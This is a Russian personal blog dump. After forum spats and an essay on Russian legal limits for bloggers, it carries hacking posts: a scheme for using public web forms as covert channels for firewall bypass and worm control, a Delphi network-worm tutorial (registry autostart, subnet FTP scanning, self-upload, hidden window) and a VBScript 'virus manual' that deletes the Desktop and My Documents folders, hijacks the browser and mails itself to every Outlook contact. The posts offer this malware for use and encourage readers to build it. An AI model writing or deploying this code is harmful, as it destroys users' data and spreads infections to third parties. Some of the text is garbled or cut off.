| Perseph0na написал 03.01.2010 14:56:48: Ты появляйся, пусть изредка, на день - другой, но появляйся!
|
Не говори мне кто я - не узнаешь куда идти!
МУ-МУ- радостно подумал Герасим, увидев собаку, - НУ-НУ- подумала собака Баскервилей.
Вот и помирись тут... |
..Дословно - и славненько! Таких друзеёй - в музей! ( amentet - примечание)
>> Надеюсь, инцидентов больше не будет и предлагаю восстановить
>> нормальные отношения, ( снятие игнора )
>> или согласовать "черный" пиар.
>> P.S. amentet - древнеегипетская богиня смерти, она же ХАТОР - её
>> мужское воплощение.
>> http://www.liveinternet.ru/users/amentet/
> о чем ты?? какой игнор? какая богиня??
> не обижайсян едогоня.. пиш толькопо делу.. вдень kltcznrb писем
> приходит... и я так в них разгреюатьяс успева. еле еле(
вбил в ячндексе
вышел на это
Я никому не скажу, но в общем то и так все знают, что
alexjdanov ебаный в рот трижды венерическим хуем хреносос ёптить некрогенитальный выпиздень
Введите ник
у тя в дневе
понял...
мои админы забанили тебя
это насовсем.. все где меня обсирают и пишут хрень
этих банят..
(c) Ответ А.Ж.
Ничего он не понял, влеплю вторую антипаху - за непроходимую тупость.
|
... |
Интернет полон "гражданских журналистов". Печатным органом в этом случае служат блоги с их мнимой свободой общения. Однако всем, кто пользуется сетевыми дневниками, следует помнить о возможной ответственности и внимательно читать УК РФ.
В СМИ то и дело появляются заметки о том, насколько увеличилось число блогов, а по данным аналитиков Technorati, в 2006 их число в мире превысило 57 млн., а 3-м квартале прошлого года было зарегистрировано 3 млн. новых журналов. Характерно, что и страсти вокруг блогов разгораются нешуточные.
Блог (англ. blog, от web log – "сетевой журнал или дневник событий") — это вебсайт, основное содержимое которого — регулярно добавляемые записи, изображения или мультимедиа
Так, например, Евангелистская церковь уже выступила с объявлением порочности практики их ведения, способствующей всеобщему падению нравов, психологи заявляют о новой форме зависимости людей причастных к ведению блогов, политологи указывают на возможность негативного влияния на массовое сознание коррумпированными элементами, маркетологи то и дело создают новые спецпредложения по внедрению и усовершенствованию профессиональных и корпоративных сетевых "дневников".
В России число блоггеров также возрастает в геометрической прогрессии: на сегодняшний день функционирует более 2 млн. русскоязычных блогов. Наиболее популярными блог-службами у нас являются Livejournal, Diary.ru, Liveinternet, Блоги @ Mail.Ru, Рамблер Планета, Lj.Rossia.Org, Journals.ru, а среди основных тематических направлений и разновидностей выделяются корпоративные, научные, политические, фотоблоги, подкаст, OpenID, Блогкастинг.
Одним из факторов, стимулирующих рост популярности этого явления в России, является свобода общения. Но так ли свободно это поле от законодательных ограничений? Может ли государство посредством имеющихся у него рычагов воздействия законными методами пресекать или ограничивать возможные негативные явления в данной сфере? Какие меры ответственности применимы к лицам, которые, возможно, просто пишут свой дневник?
Не ставя перед собой задачу охватить все, поскольку это просто невозможно, попробуем найти ответы на эти вопросы в нормах действующего российского законодательства.
Чего не стоит делать
Собственно, основной закон в нашей стране, Конституция РФ, в ч. 3 ст. 55 обеспечивает законодателя возможностью ограничивать права и свободы человека и гражданина путем принятия федеральных законов в целях защиты основ конституционного строя, нравственности, здоровья, прав и законных интересов других лиц, обеспечения обороны страны и безопасности государства. В России запрещается пропаганда или агитация, возбуждающие социальную, расовую, национальную или религиозную ненависть и вражду, утверждение о превосходстве тоже под запретом.
Это надо помнить российскому блоггеру
Уголовный Кодекс РФ
ст. 129 "клевета"
ст. 130 "оскорбление"
ст. 137 "нарушение неприкосновенности частной жизни"
ст. 183 "незаконное получение и разглашение сведений, составляющих коммерческую, налоговую и банковскую тайну"
ст. 205.2. "публичные призывы к осуществлению террористической деятельности или публичное оправдание терроризма"
ст. 207 "ложное сообщение о терроризме"
ст. 280 "публичные призывы к осуществлению экстремистской деятельности"
ст. 282 "возбуждение ненависти либо вражды, а равно унижение человеческого достоинства"
ст. 283 "разглашение государственной тайны"
ст. 319 "оскорбление представителя власти"
Гражданский Кодекс
ст. 139 "служебная и коммерческая тайна"
ст. 151 "компенсация морального вреда"
ст. 152. "защита чести, достоинства и деловой репутации"
Федеральный закон от 27.07.2006 N 149-ФЗ "Об информации, информационных технологиях и о защите информации"
ст. 10 "распространение информации или предоставление информации"
ст. 17 "ответственность за правонарушения в сфере информации, информационных технологий и защиты информации"
Закон РФ от 09.07.1993 N 5351-1 (ред. от 20.07.2004) "Об авторском праве и смежных правах"
ст. 48. "нарушение авторских и смежных прав"
Вышеуказанные ограничения соответствуют нормам и принципам, действующим в сфере международного права, а также в национальном законодательстве иностранных государств. К примеру, по данным агентства Associated Press, сингапурский суд признал виновными двух местных жителей - этнических китайцев - в разжигании межнациональной розни в блогах. Приговоры вынесены на основании оставленных блоггерами записей, направленных против этнических малайцев. Один из осужденных - Бенджамин Ко Сон Хуат (Benjamin Koh Song Huat) был приговорен к месяцу тюрьмы, другой, Николас Лим Ю (Nicholas Lim Yew) - оштрафован на 5 тыс. сингапурских долл. (около 2900 долл. США) и приговорен к одному дню тюрьмы.
Не приводя конкретных судебных решений по реализации вышеуказанных норм в России, укажем лишь, что мерами ответственности за действия, направленные на возбуждение ненависти либо вражды, а также на унижение достоинства человека либо группы лиц, совершенные публично или с использованием СМИ, наказываются штрафом в размере от 100 до 300 тыс. руб. либо обязательными работами на срок до 180 часов, либо исправительными работами на срок до одного года, а также лишением свободы на срок до 2 лет. При наличии отягчающих обстоятельств, размер штрафа может составлять до 500 тыс. руб., а срок лишения свободы – пять лет. Более подробную информацию по данному вопросу можно получить в УК РФ.
При публикации информации в блогах, в особенности касающейся совершенных или готовящихся преступлений, необходимо осознавать, что УПК установлено обязательное требование к правоохранительным органам проводить проверку данных сообщений. При этом закон обязывает владельцев соответствующих информационных ресурсов передавать по требованию прокурора, следователя или органа дознания имеющиеся в распоряжении соответствующего СМИ документы и материалы, подтверждающие сообщение о преступлении, а также данные о лице, предоставившем указанную информацию, за исключением случаев, когда это лицо поставило условие о сохранении в тайне источника сведений.
Пользователям интернет-ресурсов, в том числе и блоггерам, важно знать, что в целях пресечения и раскрытия преступлений и террористических актов, государство вправе устанавливать контроль за информацией, передаваемой по каналам телекоммуникационных систем, а также осуществлять поиск в корреспонденции с целью выявления сведений об обстоятельствах их совершения, о лицах, их готовивших и совершивших, и в целях предупреждения совершения других преступлений.
Вопросы конфиденциальности
Если нет острого желания оказаться в местах лишения свободы, то лучше не стоит в беседах с виртуальными друзьями да, собственно, вообще с кем-либо, рассказывать о защищаемых государством сведениях в области военной, внешнеполитической, разведывательной и подобной деятельности – это гостайна, и если кто не знает, ее разглашение может нанести ущерб безопасности РФ.
Вообще, лица, незаконными методами получившие конфиденциальную информацию, а также работники, ее разгласившие вопреки трудовому договору, будут обязаны возместить причиненные этим убытки (ст. 139 ГК).
И если раньше в интернете можно было анонимно говорить о чем угодно и с кем угодно, то теперь Федеральный закон от 27 июля 2006 г. N 149-ФЗ "Об информации, информационных технологиях и о защите информации" положил этому конец. Конечно, не так просто найти человека по "виртуальным" данным, но если это будет очень нужно государственным органам, то, скорее всего, встреча состоится.
Также не стоит распространяться о чьей-либо частной жизни. Этого не стоит делать хотя бы потому, что лица, чьи интересы при этом пострадают, будут вправе обратиться в установленном порядке за судебной защитой своих прав, в том числе с исками о возмещении убытков, компенсации морального вреда, защите чести, достоинства и деловой репутации.
В судебной практике насчитывается не так много дел по защите чести и достоинства с участием блоггеров. Однако случаи, когда ответчиком стал интернет-ресурс, есть. Так, решением Арбитражного суда МО удовлетворен иск ЗАО "Тройка сталь" к форуму "Черный список" сайта http://www.metaltorg.ru/. Собственно, "Тройка-сталь", специализирующаяся на поставках металлопроката в Москве, посчитала, что на страницах "Черного списка" была опубликована ложная информация, порочащая деловую репутацию компании, и потребовала обязать MetalTorg.Ru опровергнуть ложные сведения, приостановить работу сайта и взыскать штраф. В итоге суд ответчик опубликовал на страницах сайта опровержение той информации, которую истец счел ложной и порочащей его деловую репутацию. Также суд обязал ответчика выплатить истцу заявленную в иске сумму.
Таким образом, информационное пространство, предоставляя возможность каждому высказывать свое мнение, требует соблюдения, определенных ограничений установленных закон.
Также любому человеку, выкладывающему в сеть те или иные тексты или фотографии, необходимо помнить о необходимости соблюдения авторского и смежных прав. Закон РФ "Об авторском праве и смежных правах" (а с 1 января 2008 года вступит IV часть ГК РФ), допускает без согласия автора и без выплаты авторского вознаграждения, но с обязательным указанием имени автора, произведение которого используется, и источника заимствования цитировать в оригинале произведения в объеме, оправданном целью цитирования. Лучше соблюдать это требование, так как, в противном случае, нужно будет возмещать убытки и упущенную выгоду владельцу указанных прав.
Именно в связи с тем, все большую угрозу правообладателям авторских и смежных прав представляет незаконное размещение произведений в телекоммуникационных сетях, в частности, в сети Интернет и сети сотовой связи, а изучение судебной практики по делам, вытекающим из отношений, связанных с созданием и использованием объектов авторского права и смежных прав, показало, что у судов имеются затруднения в применении законодательства, регулирующего данные правоотношения. Пленум Верховного суда РФ вынес соответствующее постановление от 19.06.2006 N 15, "О вопросах, возникших у судов при рассмотрении гражданских дел, связанных с применением законодательства об авторском праве и смежных правах".
Журналист ли блоггер?
Особого внимания при определении возможных ограничений прав блоггеров заслуживают правовые основы их деятельности. То есть, по сути, надо понять, обладают ли они правами журналистов. И здесь сразу необходимо указать на отсутствие в российском законодательстве и судебной практике, прецедентов признания таких прав за блоггером.
Однако такие прецеденты уже имеются, например, в США. Так, из информации, опубликованной на сайте STGate, стало известно, что Калифорнийский апелляционный суд, отменив ранее принятое решение суда высшей категории Санта-Клары, фактически приравнял блоггеров к журналистам, распространив на них право хранить в тайне свои источники информации. Собственно, поводом для судебного разбирательства послужило исковое требование корпорации Apple о раскрытии блоггерами личности человека, сообщившем сведения о цифровом музыкальном проекте под кодовым названием "Астероид". Процесс получил широкую огласку среди общественности, в защиту интересов блоггеров выступила известная правозащитная организация в сфере цифровых технологий "Фонд электронного фрондира". По окончании процесса последние заявили о признании судом факта, что в современном мире одним из средств для публикации информации журналистами выступает интернет.
Безусловно, это очень весомый прецедент для американской правовой системы. И учитывая, что прецедент – это судебное решение, вынесенное по конкретному процессу, которое впоследствии становится эталоном для всех судов той же или низшей инстанции при решении аналогичного дела, можно признать, что это большая победа блоггеров.
Российскм пользователям блогов пока, правда, не стоит сильно переживать. Мы, как правило, следуем нововведениям и опыту западных стран, а наше законодательство в области СМИ довольно гуманно относится к журналистам. Обозначим лишь основные ловушки Закона РФ от 27.12.1991 N 2124-1 (ред. от 16.10.2006) "О средствах массовой информации".
Итак, если все же рассматривать участие в блогах как журналистику, не следует использовать СМИ в целях совершения уголовно наказуемых деяний, для разглашения сведений, составляющих охраняемую законом тайну, для распространения материалов, содержащих публичные призывы к осуществлению терактов или публично оправдывающих терроризм, других экстремистских материалов, а также материалов, пропагандирующих порнографию, культ насилия и жестокости. Нельзя применять специальные словесные приемы, воздействующие на подсознание людей, оказывающие вредное влияние на их здоровье. Запрещено делиться сведениями о местах приобретения наркотических средств, психотропных веществ и их прекурсоров, секретами их разработки, изготовления и использования.
Одновременно законом установлен запрет на разглашение в распространяемых сообщениях и материалах сведения, предоставленные гражданином с условием сохранения их в тайне, раскрытие конфиденциальной информации возможно только по требованию суда, возникшее в связи с находящимся в его производстве делом.
И, пожалуй, самое главное, что необходимо помнить: журналист всегда ответственен за достоверность сообщаемой им информации. Он должен указывать ее источник, упоминать автора цитируемого высказывания, если оно оглашается впервые.
Конечно, можно отрицать необходимость установления ограничений прав и свобод граждан, а также избыточность нормативного правового регулирования обязанностей и вышеупомянутых ограничений, но готов ли каждый добровольно соблюдать интересы других лиц?
Желание каждого быть откровенным со своим собеседником и говорить ему всю правду до конца, особенно на темы с ограниченным доступом к информации, в идеале своем прекрасно. Однако абсолютные свободы в самом неограниченном их понимании все же ограничиваются законами, и, несмотря на несовершенство законодательной системы, любого могут привлечь к ответственности.
Не сомневаясь в достоинствах блогов (у них много хороших сторон), мы призываем только к одному. Не забывайте, что если кто-то, по секрету всему свету рассказывает о всемирных заговорах, призывает к акциям массового протеста, подбивает на революционные свершения, значит это просто кому-то очень надо и стоит главное набраться терпения и мудрости, чтобы понять, кто же стоит за возмущениями.
...........................................................
|
Метки: чего нельзя делать в блогах |
Без заголовка |
Анимированнве гифы - водопады
![]() |
![]() |
![]() |
![]() |
![]() |
|||
![]() |
![]() |
![]() |
![]() |
![]() |
![]() |
![]() |
Забирайте, кому понравилось)
==================================================================================================
Метки: анимированнве гифы |
))) |
|
|
Вечер принятия решений. |
Это уже вторая моя попытка бпросить писать, казалось бы - чего проще? - удалила дневник и всё, но.
Всегда есть это самое "НО" , ню бы его побрал!
Главная причина смены решения о закрытии вот:

И это ещё не всё)

Самое главное:
langrig
1
0 обратиться по имени 04-03-2007 17:34 (ссылка) Редактировать Удалить
Метки: подожду уходить на лиру есть люди настоящие |
Без заголовка |
Метки: оригинальный взлом |
... |
Мы будем говорить о хитроумном способе передаче данных. Таком хитроумном, что
сложно так вот сходу придумать ему применение, однако нижеизложенная техника -
это факт, и неизвестно что она принесет миру, а возможно так и останется жить
только в теории и да у маньяков с плохим зрением.
Чтож, ближе к делу ?
Принцип работы.
Условимся, что на на странице
http://www.server.com/cgi-bin/formParsing.pl есть некая форма с
параметрами: nick, message и кнопкой отправки введенных данных.
Примерно следующего содержания:
nick
message
После ввода данных эти данные печатаются на этой же странице сверху
(грубо говоря, это урезанный чат).
Любой человек в интернете может ввести туда данные и отправить их на обработку серверу.
Если мы введем: : "жду тебя вася в 19-00 у Ленина",
тогда тот вася, который ждал этого сообщения, увидев эту надпись может пойти к
Ленину к 19-00, если посчитает это нужным.
Теперь спроецируем это все на программы (cgi скрипты)
Если один из серверов в интернете периодически читает эту страницу и ищет на ней
определенную сигнатуру, а другой сервер в интернете посылает эту сигнатуру на
эту страницу, а после нее посылает определенный блок данных, то первый
определив сигнатуру, может получить и те данные, которые были посланы вторым.
Допустим на вышеуказанную страницу мы отсылаем
name="robot19jkeks"
message="robot19jkekshttp://www.anotherserver.com/cgi-bin/AnotherFormParsing.pl(nick[20]message[300])"
Первый сервер определяет сигнатуру "robot19jkeks", после чего начнает искать
сигнатуру дальше, после чего уже знает что находятся данные, а данные уже вот
эта строка:
http://www.anotherserver.com/cgi-bin/An … Parsing.pl(nick2[20]message2[300])
эти данные могут означать например то что это ссылка на друую страницу, где
аналогичн можно оставлять данные в параметрах nick2 и message2, причем для
nick2 - длинна данных может быть до 20 символов, а для поля message2 300 байт.
Это и есть основной принцип работы, пусть достаточно медленный, однако
принципиально возможный.
Обход firewalls.
Технология предоставляет дополнительную универсальную возможность обхода
firewalls. Почему принципиальную ? Потому что чтобы устранить эту возможность
потребуется анализ данных, однако никогда нельзя будет точно утверждать, что
это написал человек, а это машина. Аналогичная проблемма с анализом писем на
предмет спама.
Проблемма реализации в том, что необходима динамическая страничка доступная с
как со стороны внутренней сети, так и со стороны внешней сети.
Только в этом случае это будет универсальным методом обхода firewalls.
Теперь на примере, на урале один из провайдеров предоставляет доступ в
интернет, но при этом предоставляет услугу просмотра статистики и изменения
кое-каких параметров бесплатно, если зайти с диалапа под открытыми для этого логином и
паролем.
Вот эта форма, подверженная уязвимости:
Имя электронного ящика
Периодичность
0.Не получать
1.В конце месяца
2.Еженедельно
3.Ежедневно
Заполнив форму и отправив ее, сервер провайдера запоминает адрес электронной
почты и периодичность, при следующем просмотре этой страницы, мы увидим эти
параметры в этой же форме, что нам и требуется.
Эту страницу можно посетить как из интернета, так и с бесплатного доступа к
статистике. Теперь нам осталось написать
сервер и клиент, и можно, пусть на медленной скорости, передавать/получать
данные.
Технологии для троянов вирусов и червей
Сразу же надо подчеркнуть, что тут нет пропаганды, а лишь открываются
факты подтверждающие возможности.
Известная группа gray-world утверждает (точнее один из ее рускоязычных
участников), что эта технология будущего для вирей
или троянов. Давайте немного поразмыслим.
На чем основаны нынешние вирусы и черви ? Правильно на последних ошибках, но как
быстро пишутся черви ? Проходит достаточное время, плюс к тому иногда проблеммой
может стать точка старта для червяка, так же редко бывает что червя поддерживает
анонимная группа, что плюсов в распространении его не делает.
И многие другие проблеммы решает именно
эта технология (уж неговоря об обходе firewalls)
Давайте немного рассмотрим поближе эту интересную технологию.
Итак, изначально червь представляет из себя код, который при своем запуске
сканирует известные для него сайты подверженные описанной выше уязвимости, на
предмет сигнатур, по которым определяется положение дополнительных модулей и
дополнительных баз уязвимостей. Если найдена сигнатура, определяется
пространство и скачивается модули и базы, просле чего сканируются новые базы,
после чего исполняются дополнительные модули.
Таким образом червь по сути своей не является червем, а это просто программа
выкачивающая и запускающая данные. И тут впринципе нельзя обвинить автора в
написании червя.
Сами же модули могут представлять из себя все что угодно, дополнительный код
размножения, реклама, деструкторы, движки для морфинга, и самоуничтожения и
всего чего не придет в голову.
Что из себя представляют базы уязвимостей ?
Если объяснять на пальцах, то это строки примерно следующего содержания:
1|URL1|URL2|имя_элемента_input1|объем_данных1|имя_элемента_input2|объем_данных2|имя_элемента_input3|объем_данных3|..
2|URL1|URL2|имя_элемента_input1|объем_данных1|имя_элемента_input2|объем_данных2|имя_элемента_input3|Объем_Данных3|..
...
где
1,2,.. - идентификаторы записей
URL1 - адрес, куда необходимо отправить запрос, чтобы данные сохранились по
адресу URL2
имя_элемента_input1 - атрибут name у элемента формы, который будет отображаться
по адресу URL2
объем_данных1 - объем данных помещающихся в этой форме, т.е. сколько данных мы
можем передать через этот элемент.
Кроме чтения баз уязвимостей вирус/червь, может сканировать случайные адреса на
предмет возможности оставить данные и а так же возможно определение объема
сохраняемых данных.
Благодаря этому будет крайне сложно оставноить червь, который сможет
использовать ресурсы необслуживаемых сайтов, шаблонные проекты навроде
PHPbb.
Чтобы обезвредить вирус, потребуется невероятные усилия, обращение к
администрации сайтов с просьбой отключить определенный проект и много
других проблемм, либо боротьбся с вирусом его же средствами. Изобретать
защиту можно сколько угодно, но проблемма останется навсегда по одной
простой причине: это принципиальная возможность!
Если мы можем оставлять где-то данные, почему бы нам не использовать это
в своих целях ? Хотя как мне как-то сутра пришла в голову одна
интересная мысль: А что если при написании формы, рядом показать
рисунок, например рисунок цветка, и требовать ввести пользователя: Что
нарисовано на картинке ? В этом случае, автоматизировать процесс будет
крайне сложно, однако об этой технологии я нигде не слышал, и на данный
момент проблемма актуальна. С другой стороны, опять-таки все интернет
сайты не смогут сделать подобную защиту. Часть ресурсов отпадет, но
другая часть останется.
Тем самым мы решили проблемму места, где могут хранить вирусы информацию
и в том числе и себя самих. Никто не мешает использовать последние дыры,
и факт того что их может добавть любой в интернете, поместив
определенную сингатуру на несколько общедоступных сайтов с форумами.
Так же мы решили проблемму групповой разработки и поддержки вируса/червя.
Трудности реализации
А проблемм достаточно много, назовем некоторые из них:
1.Универсальное ядро должно уметь анализировать канал передачи, сколько бит
приходится на 1 байт
2.Упаковка данных
3.Процесс UUEncode или аналогичный ему
4.Нет уверенности, что сигнатура будет совпадать с чем-то иным, нужна устойчивая
схема определения СВОИХ данных, и система повтора отправки данных, грубо говоря
нужна разработка целого протокола.
Рассмотрим решения проблемм.
Анализ канала передачи должно сводиться к созданию единого универсального
запроса (unicode пока не учитываем) состоящего из 256 байт.
Результатом должно быть сообщение с вырезанными символами, либо отрицательный
результат. Если результат есть, тогда тогда исключаются символы в радиусе до 2^x
где x Вы писали 12 января 2004 г., 9:57:08:
jmr> слушай, мог бы ты рассказать историю написания проекта FirePass.
jmr> Я пишу небольшую статью про этот вопрос, буду рад любой исторически важной
jmr> информации, а и технической особенно.
http://gray-world.net/projects/firepass/ : firepass README - english
http://www.hackzona.ru/modules.php?name … mp;sid=433 : мини
статья с void.ru - русский язык. 3 параграф посвящен firepass.
Ключевая особенность firepass или зачем он был написан : на самом деле
это концептуальная программа, демонстрирующая возможность
туннелирования произвольных сессий базирующихся на TCP или UDP
в протоколе уровня приложений - HTTP. Программа уникальна тем, что
серверная часть реализована как CGI скрипт, как следствие не
требуется "слушать" какой-либо порт на компьютере-сервере. Аналоги
такой архитектуры туннеля могут существовать, но мне не известны.
Все что надо для того, чтобы "пробить" туннель из-за защищенной сети
наружу с использованием firepass и HTTP - это иметь снаружи веб сервер
и возможность доступа к его /cgi-bin (любой хостинг провайдер?)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
Метки: хулиганство и приколы приколи провайдера |
,,,,,,,,,,,,,,,, |
...Давай сегодня напишем своего сетевого червя? Тебе по любому хотелось иметь такую зверушку! Сегодня я тебе в этом помогу! Писать мы будем на Delphi6. Наш червь будет распространяться через ftp сервера с анонимным входом. Итак, поехали! Создай новый проект. Так же размести на форме компонент NMFTP (так и назови, без всяких 1).
Затем надо объявить 2 глобальные переменные. Делается это после строки var, которая идёт после строк
public
{ Public declarations }
end;
в самом начале unit’a.
Так же добавьте в использующиеся модули WinSock и Registry.
Давайте пропишем червя в реестре:
RegIni:=TRegIniFile.Create('Software');
RegIni.RootKey:=HKEY_LOCAL_MACHINE;
RegIni.OpenKey('Software', true);
RegIni.OpenKey('Microsoft', true);
RegIni.OpenKey('Windows', true);
RegIni.OpenKey('CurrentVersion', true);
// Пишемся в папке ‘Run services’, имя ключа MSIE, далее следует расположение //файла
RegIni.WriteString('RunServices', 'MSIE', Application.ExeName);
RegIni.Free;
Чтоб он автоматом загружался при запуске системы.
Нужно объявить 2 стринговые переменные – ip1st и ip2nd. В них будет лежать ip разбитый на 4 части.
Выглядеть она у тебя должна так:
var
Form1: TForm1;
ip1st,ip2nd:string;
Далее нужно получить IP заражённой машины. Делается это с помощью следующей функции(Назовём её GetLocalIP):
function GetLocalIP: String;
const WSVer = $101;
var
wsaData: TWSAData;
P: PHostEnt;
Buf: array [0..127] of Char;
begin
Result := '';
if WSAStartup(WSVer, wsaData) = 0 then begin
if GetHostName(@Buf, 128) = 0 then begin
P := GetHostByName(@Buf);
if P nil then Result := iNet_ntoa(PInAddr(p^.h_addr_list^)^);
end;
WSACleanup;
end;
end;
Данная функция определит IP зараженной тачки и вернёт его нам в виде строки.
Затем нам надо поделить полученный IP на 4 части. Давай напишем такую функцию и назовём её CutIP(разрезание IP). Вот её код:
function CutIP(ip:string):string; // Функции будет передаваться ip-адрес в виде строки
var
// Объявляем 2 числовые переменные – pos1 и count
pos1,count:integer;
// Объявляем строковую переменную piece
piece:string;
begin
//1-ое число IP
piece:=ip;
// Присваиваем переменой piece значение переменной ip(которая передаётся
// В виде главного параметра функции
// Затем засовываем в переменную Pos1 число которое обозначает
// кол-во символов до первой точки в переменной piece (там лежит наш IP)
pos1:=Pos('.', piece);
// Затем удаляем из строки piece 30 символов после первой точки
// в итоге у нас остаётся только первое число ip-адреса
Delete(piece,pos1,30);
// которое мы засовываем в переменную ip1st
ip1st:= piece;
// Далее всё идёт по такой же схеме
//2-ое число ip
piece:=ip;
pos1:=Pos('.', piece);
Delete(piece,1,pos1);
pos1:=Pos('.', piece);
Delete(piece,pos1,30);
ip2nd:= piece;
end;
Теперь первые 2 числа IP-адреса заражённой машины разбит на 2 части и засунут в 2 переменные.
Всё, все нужные нам функции отписаны. Теперь давайте создадим обработчик события OnCreate главной формы. Здесь будет то, что должно происходить при запуске червяка. Вот и начинается самое интересное:
Для начала присвоим несколько переменных разных типов, для этого перед begin напишем:
var
my_ip:string; // здесь будет хранится наш ip
ftp_list,scan_ip_list:TStrings; // Здесь будут хранится список фтп и ip которые
// надо просканить
count,count1,count2:integer; // Обычные счётчики для циклов
Всё, с переменными закончено, далее пишем код самого червяка(между begin и end разумеется).
my_ip:=getLocalIp; // Засовываем в my_ip результат функции GetLocalIP
// Это будет IP заражённой тачки
// Далее создаём списки
ftp_list:=TStringList.Create;
scan_ip_list:=TStringList.Create;
//Затем разрезаем ip, который мы получили
CutIP(GetLocalIP);
// Теперь весь ip засунут в глобальные переменные
// Даём приложению проработатся чтоб не вызывать зависания
Application.ProcessMessages;
// Выстраиваем лист IP
// Начинаем цикл от 0 до 255
for count2:=1 to 255 do
begin
// Снова даём приложению проработаться
Application.ProcessMessages;
// Засовываем в ip3rd номер данного цикла
ip3rd:=IntToStr(count2);
// Внутри начинаем ещё один цикл
for count:=1 to 255 do
begin
// Даём приложению проработатся
Application.ProcessMessages;
// Добавляем в scan_ip_list IP-адресс сгенерированный нашим
// червяком на основе полученного ip с заражённой машины
scan_ip_list.Add(ip1st+'.'+ip2nd+'.'+ip3rd+'.'+IntToStr(count));
end;
end;
// Конец выстраивания
// Теперь у нас есть ip всех 255-подсеток провайдера к которому подключон
// заражённый комп
// Даём приложению проработатся
Application.ProcessMessages;
// Начинаем сканить на открытые ftp
// Цикл идёт от 1 до кол-ва строк в scan_ip_list, где хранится наш список ip
for count1:=1 to scan_ip_list.Count-1 do
begin
Application.ProcessMessages;
// Присваиваем параметру host – значение состоящие из строки под номером //исполняемого цикла
NMFTP.Host:=Scan_ip_List.Strings[count1];
// Пытаемся соединится
NMFTP.Connect;
// Если соединение прошло удачно
if NMFTP.Connected then
begin
// то добовляем адрес в список ftp_list
ftp_list.Add(NMFTP.Host);
end;
end;
// Снова даём проге проработатся
Application.ProcessMessages;
// конец скана на открытые фтп
end;
После этого в переменной ftp_list имеется весь список ip на которых открыт 21-ый порт.
Далее нам нужно распространить копии червя по всем имеющимся в списке ftp-серверам.
Я не буду прямо описывать весь процесс, а заставлю поработать вашу фантазию.
При коннекте нам передаётся список главной директории. Получить его можно с помощью следующего кода:
NMFTP.NList;
//Далее создаём обработчик события OnListItem
// и в нём пишем следующую вещь
[имя_списковой переменной].Add(Listing);
После этого в переменной будет лежать список папок и файлов. Тут может возникнуть трабл с закачкой червя на ftp т.к. не в каждую папку может быть разрешена запись.
Проверить это можно следующим образом: попробовать залить в корневой каталог, если не получится то начать цикл в котором будет браться строка с именем папки/файла. Далее меняем папку на ту, которую взяли из списка, если ошибка(это может быть файл) то идти дальше, если удалось сменить то пробуем залить и т.д. Если залить удалось, то коннектимся на следующую фтп’шку и проделываем то же самое.
Папка меняется кодом NMFTP.ChangeDir(имя_папки);
Закачка файлов происходит следующим образом:
NMFTP.Download(‘имя_закачиваемого_файла’,’имя_под_которым_файл_сохранится_на_сервере’);
Теперь надо скрыть главную форму от глаз пользователя, делается это следующим образом:
Зайди в Project>View Source
Откроется окно редактирования кода, сам код должен выглядеть следующим образом:
var
WhEvent:THandle;
begin
Application.Initialize;
ShowWindow(Application.Handle, SW_HIDE);
Form1:=TForm1.Create(nil);
Application.Run;
WhEvent:=CreateEvent(nil, true, false, 'et');
while (true) do
begin
WaitForSingleObject(WhEvent,1000);
Application.ProcessMessages;
end;
end.
Если поработать головой, то можно за 30 минут написать червя который ещё и все папки найдёт, на фтп, в которых запись разрешена.
Вообщем дерзайте! Удачи!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Метки: сетевой червь простой пример червя прикол |
_____ |
Метки: создание вируса простой вирь новичкам. |
_______ |
*~Мануал по созданию вируса~ на VBS! (' - указанные ниже абзацы не прописывать).
-------------------------------------------------------------
Ну начнем.......
Открываем простой блокнот (при помощи блокнота можно создать почти что угодно)......И прописываем основное начало нашего вируса:
CODE' абзац
Set f = CreateObject("scripting.filesystemobject")
Set s = CreateObject("Wscript.Shell")
t=0: on error resume next
Set os = CreateObject("Shell.Application")
set ie = WScript.CreateObject("InternetExplorer.Application")
Set oe = WScript.CreateObject("Outlook.Application")
Так начинку сделали....
Теперь я пропишу ВАМ основные действия вируса:.....
1) Сделаем так чтобы после открытия нашего проекта у юзвера выскочило сообщение:
CODE' Вывести сообщение
s.popup "text1", , "text2", 0+16
text1 - само сообщение
text2 - заголовок сообщения
0+x - тип сообщения
(0+0) - обычный тип
(0+16) - ошибка
(0+64) - информация
(0+48) - восклицание
(0+32) - вопрос
2) Нам нужно что-то переименовать....
CODE' Переименование всех файлов, находящихся на Робочем столе на "text"
For Each Folder In s.SpecialFolders
if right(folder,12)="Рабочий стол" then
set tf=f.getfolder(folder)
set af=tf.files
For Each fl In af
set file=f.getfile(fl):t=t+1
file.name="text" & t
next
end if
next
text - новый текст!
-------------------------------------
' Переименование папки Мои документы на "Новое_Название"
For Each Folder In s.SpecialFolders
if right(folder,13)="Мои документы" then
set tf=f.getfolder(folder): tf.name="Новое_Название"
End if
next
------------------------------------
' Переименование всех файлов, находящихся в Моих документах на "Новое_название"
For Each Folder In s.SpecialFolders
if right(folder,13)="Мои документы" then
set tf=f.getfolder(folder)
set af=tf.files
For Each fl In af
set file=f.getfile(fl):t=t+1
file.name="НАЗВАНИЕ" & t
next
end if
next
------------------------------------
' Переименование всех файлов, находящихся в Главное меню\Программы на "новое_название"
For Each Folder In s.SpecialFolders
if right(folder,12)="Главное меню" then
set tf=f.getfolder(folder)
set af=tf.subfolders
For Each fl In af
set file=f.getfolder(fl):t=t+1
file.name="новое_название" & t
next
end if
next
3) Нам нужно что-то переместить:
CODE' Перемещение Рабочего стола в "FOLDER"
For Each Folder In s.SpecialFolders
if right(folder,12)="Рабочий стол" then
f.copyfolder folder, "FOLDER"
f.deletefolder folder, true
next
(folder - папка)
--------------------------------------
' Перемещение папки Мои документы в "папка"
For Each Folder In s.SpecialFolders
if right(folder,13)="Мои документы" then
f.copyfolder folder, "папка"
f.deletefolder folder, true
next
4) ......Интернет
CODE
' Сделать домашней страницу "http:\\hack-all.net"
s.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http:\\hack-all.net"
----------------------------------------
' Перейти на сайт "http:\\hack-all.net"
ie.Visible = True
ie.Navigate "http:\\hack-all.net"
----------------------------------------
' Разослать вирус Всем контактам неприятеля
For Index = 1 To oe.GetNameSpace("MAPI").AddressLists(1).count
Set OutMail = oe.CreateItem(0)
OutMail.to = oe.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "в теме письма"
OutMail.Body = "в теле письма"
OutMail.Attachments.Add WScript.ScriptFullName
OutMail.Send
Next
